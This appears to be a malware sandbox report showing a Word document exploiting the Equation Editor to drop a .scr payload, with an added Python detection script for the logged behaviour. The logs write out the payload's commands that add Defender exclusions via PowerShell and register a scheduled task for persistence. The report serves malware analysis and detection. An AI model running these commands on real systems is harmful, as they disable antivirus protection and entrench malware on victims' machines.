Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {028588F3-95E8-48BE-8F64-19174D00F448} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Process created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp"
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe Process created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe Process created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe"
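The process-creation chain above (WINWORD.EXE to EQNEDT32.EXE to a .scr in %APPDATA%, which adds Defender exclusions via PowerShell and registers a task from an XML file in %TEMP%, after which taskeng.exe launches the persisted binary) is exactly what the report's Sigma hits "Suspicious Microsoft Office Child Process", "Powershell Base64 Encoded MpPreference Cmdlet" and "Scheduled temp file as task from temp location" describe. The following is an added example, not Joe Sandbox output and not the Sigma rules themselves: a small Python detection pass that parses the report's own "Process created" lines and applies four hand-written rules to them. The rule names, the LOLBin and user-writable path lists, the benign control line and the constructed base64 (-enc) variant of the Add-MpPreference call are this example's assumptions; the five report lines are copied verbatim from above.

```python
"""Detection pass over the process-creation lines in this report (added example).

Re-implements, as plain Python, the behaviours behind the report's Sigma hits:
an Office / Equation Editor child process, a Defender exclusion added via
PowerShell (clear or base64-encoded), a task registered from an XML file in a
temp directory, and Task Scheduler launching a binary from a user profile.
Rule names, path/LOLBin lists and the control lines are assumptions of this example.
"""
import base64
import re
from typing import Dict, List

# Copied from the report's "Process created" entries (parent -> image + command line).
REPORT_LINES = [
    r'Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding',
    r'Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\obimohohj75.scr "C:\Users\user\AppData\Roaming\obimohohj75.scr"',
    r'Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr"',
    r'Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"',
    r'Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe',
]

# Constructed control lines (not from the report): a benign launch, and the
# base64 (-enc) form of the same Defender-exclusion cmdlet.
_ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
).decode("ascii")
CONSTRUCTED_LINES = [
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"',
    r'Source: C:\Users\user\AppData\Roaming\dropper.exe Process created: '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoP -W Hidden -enc ' + _ENCODED,
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe", "schtasks.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
SHELLS = {"powershell.exe", "pwsh.exe"}


def parse_line(line: str) -> Dict[str, str]:
    """Split 'Source: <parent> Process created: <image> <cmdline>' into its parts."""
    parent, _, child = line.partition(" Process created: ")
    if parent.startswith("Source: "):
        parent = parent[len("Source: "):]
    if ' "' in child:                                   # quoted command line after the image path
        image, _, rest = child.partition(' "')
        cmdline = '"' + rest
    else:                                               # unquoted: image, then a second drive-letter path
        image, cmdline = re.match(r"^(.*?) ([A-Za-z]:\\.*)$", child).groups()
    return {"parent": parent, "image": image, "cmdline": cmdline}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decoded_powershell(cmdline: str) -> str:
    """Append the decoded payload of a -e/-ec/-enc/-EncodedCommand argument (UTF-16LE base64)."""
    m = re.search(r"(?i)-e(?:c|n|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{8,})", cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):            # not base64 / not UTF-16: leave untouched
        return cmdline


def analyze(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per rule hit, in input order."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_line(line)
        parent, child = basename(ev["parent"]), basename(ev["image"])
        image = ev["image"].lower()
        cmd = (decoded_powershell(ev["cmdline"]) if child in SHELLS else ev["cmdline"]).lower()

        def hit(rule: str) -> None:
            findings.append({"rule": rule, "parent": parent, "child": child})

        # 1. Office or Equation Editor spawning a LOLBin, or anything from a user-writable path
        #    (WINWORD -> EQNEDT32 itself is normal; EQNEDT32 -> %APPDATA%\*.scr is the exploit).
        if parent in OFFICE_PARENTS and (child in LOLBINS or any(p in image for p in USER_WRITABLE)):
            hit("office_child_process")
        # 2. Defender exclusion via PowerShell, whether passed in clear or base64-encoded.
        if child in SHELLS and "add-mppreference" in cmd and "-exclusion" in cmd:
            hit("defender_exclusion")
        # 3. schtasks /Create whose /XML definition lives in a temp directory.
        if child == "schtasks.exe" and "/create" in cmd:
            xml = re.search(r'/xml\s+"?([^"]+)"?', cmd)
            if xml and any(t in xml.group(1) for t in TEMP_DIRS):
                hit("schtasks_temp_xml")
        # 4. The payoff of 3: Task Scheduler launching a binary out of a user profile
        #    (taskeng.exe on Windows 7; on Windows 10 tasks run under svchost.exe).
        if parent in ("taskeng.exe", "svchost.exe") and any(p in image for p in USER_WRITABLE):
            hit("scheduled_task_user_profile_binary")
    return findings


if __name__ == "__main__":
    for f in analyze(REPORT_LINES + CONSTRUCTED_LINES):
        print(f"{f['rule']:38} {f['parent']} -> {f['child']}")
```

Run stand-alone it prints one line per hit: the EQNEDT32 -> .scr launch, the Add-MpPreference call, the schtasks /Create from %TEMP%, the taskeng.exe launch of the persisted .exe, and the constructed -enc variant; the WINWORD -> EQNEDT32 launch and the notepad control line produce nothing. Rule 2 decodes the encoded-command form because that is the variant the report's Sigma hit is named for, even though this sample passed the cmdlet in clear text.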
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: credssp.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ncrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: bcrypt.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: bcrypt.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: wbemcomn2.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ntdsapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: credssp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrSection loaded: vaultcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: wbemcomn2.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rpcrtremote.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ntdsapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: credssp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeSection loaded: vaultcli.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                    Source: Scan 368 1.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Scan 368 1.doc
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

                    Data Obfuscation

                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.cs | .Net Code: P5aVvXVtpi System.Reflection.Assembly.Load(byte[])
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E412C push edx; ret 2_2_002E44D7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E6026 push ebx; ret 2_2_002E6027
